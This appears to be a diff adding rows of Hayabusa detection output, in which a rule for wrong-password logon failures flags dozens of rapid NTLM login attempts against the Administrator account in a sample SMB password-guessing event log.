+2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
